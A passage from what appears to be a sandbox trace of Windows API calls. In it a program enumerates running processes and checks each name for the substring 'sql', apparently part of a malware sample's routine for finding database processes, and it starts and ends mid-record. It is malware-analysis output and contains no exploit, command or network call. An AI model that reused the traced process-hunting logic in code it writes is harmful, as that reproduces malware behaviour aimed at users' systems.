th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0152.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.773] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583da0 [0152.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3583da0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0152.773] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0152.773] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0152.773] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.775] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583db8 [0152.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3583db8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0152.775] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0152.775] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0152.775] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0152.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.898] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596d48 [0152.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3596d48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0152.899] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0152.899] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0152.899] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0152.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0152.900] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3585aa8 [0152.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3585aa8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0152.900] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0152.900] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0152.900] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0152.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0152.902] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596d68 [0152.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3596d68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0152.902] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0152.902] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0152.902] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0152.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0152.903] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3596ba8 [0152.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3596ba8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0152.903] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0152.903] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sql") returned 0x0 [0152.903] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0152.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.905] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583ce0 [0152.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3583ce0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0152.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0152.905] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0152.905] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0152.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0152.906] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596dc8 [0152.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3596dc8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0152.906] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0152.906] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0152.906] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0152.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.908] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583e00 [0152.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3583e00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0152.908] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0152.908] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0152.908] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0152.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.909] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583e30 [0152.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3583e30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0152.909] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0152.909] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0152.910] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0152.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0152.911] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585990 [0152.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3585990, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0152.911] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0152.911] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0152.911] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0152.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.912] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596b88 [0152.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3596b88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0152.912] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0152.912] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0152.912] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0152.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0152.914] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3585b98 [0152.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3585b98, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0152.914] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0152.914] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0152.914] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0152.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.915] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596de8 [0152.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3596de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0152.915] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0152.915] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0152.915] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0152.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.917] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583cb0 [0152.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3583cb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0152.917] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0152.917] StrStrIA (lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0152.917] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0152.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0152.919] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585c60 [0152.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3585c60, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0152.919] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0152.919] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0152.919] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0152.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.920] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596ca8 [0152.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3596ca8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0152.920] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0152.920] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0152.920] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0152.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0152.922] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596e88 [0152.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3596e88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0152.922] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0152.922] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0152.922] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0152.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0152.924] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585be8 [0152.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3585be8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0152.924] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0152.924] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0152.924] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0152.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0152.925] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583e18 [0152.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3583e18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0152.925] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0152.925] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0152.925] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0152.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0152.926] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583e48 [0152.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3583e48, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0152.927] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0152.927] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0152.927] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0152.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0152.928] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585ad0 [0152.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3585ad0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0152.928] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0152.928] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0152.928] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0152.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0152.929] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3585c88 [0152.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3585c88, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 